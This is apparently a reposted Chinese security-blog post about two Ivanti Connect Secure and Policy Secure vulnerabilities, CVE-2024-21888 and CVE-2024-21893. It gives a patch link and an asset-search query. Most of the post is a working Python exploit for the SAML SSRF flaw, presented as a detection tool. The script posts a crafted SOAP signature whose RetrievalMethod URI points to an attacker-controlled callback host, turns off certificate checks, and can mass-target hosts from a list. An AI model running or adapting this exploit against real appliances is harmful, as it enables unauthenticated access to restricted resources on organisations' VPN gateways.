【2024年2月1日】Ivanti公开两大【高危漏洞】:CVE-2024-21888 /CVE-2024-21893,存在提权危害;Threatbook支持相关组件查询。
【漏洞危害】:CVE-2024-21888该漏洞源于 Web 组件中存在权限提升漏洞,允许用户将权限提升至管理员的权限。
CVE-2024-21893该漏洞源于SAML 组件中的存在服务器端请求伪造漏洞,允许攻击者无需身份验证访问某些受限资。
一、【漏洞补丁链接】: https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
二、【Threatbook 查询语法】:app="Ivanti-Connect-Secure" app="Ivanti-Policy-Secure"
三、工具利用
run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com
import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import argparse from urllib.parse import urlparse def ensure_http(url): if not url.startswith("http://") and not url.startswith("https://"): return f"https://{url}" return url def send_poc(target_url, attacker_server): payload_template = """<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="{attacker_server}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body> </soap:Envelope>""" target_url = ensure_http(target_url) payload = payload_template.format(attacker_server=attacker_server) parsed_url = urlparse(target_url) full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws" host = parsed_url.netloc headers = { "Content-Type": "text/xml", "User-Agent": "curl/8.4.0", "Accept": "*/*", "Connection": "close", "Content-Length": str(len(payload)) } response = requests.post(f"{parsed_url.scheme}://{host}{full_path}", data=payload, headers=headers, verify=False) print(f"Sending PoC to {target_url}...") def main(): parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.') parser.add_argument('-u', '--url', type=str, help='Single target URL') parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs') parser.add_argument('-a', type=str, required=True, help='Attacker server URL') args = parser.parse_args() if args.url: send_poc(args.url, args.a) elif args.list: with open(args.list, 'r') as file: for line in file: target = line.strip() if target: send_poc(target, args.a) else: print("No target specified. Use -u for a single target or -l for a list of targets.") if __name__ == "__main__": main()
原文始发于微信公众号(Web安全工具库):提权漏洞CVE-2024-21893检测工具(2月3日更新)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论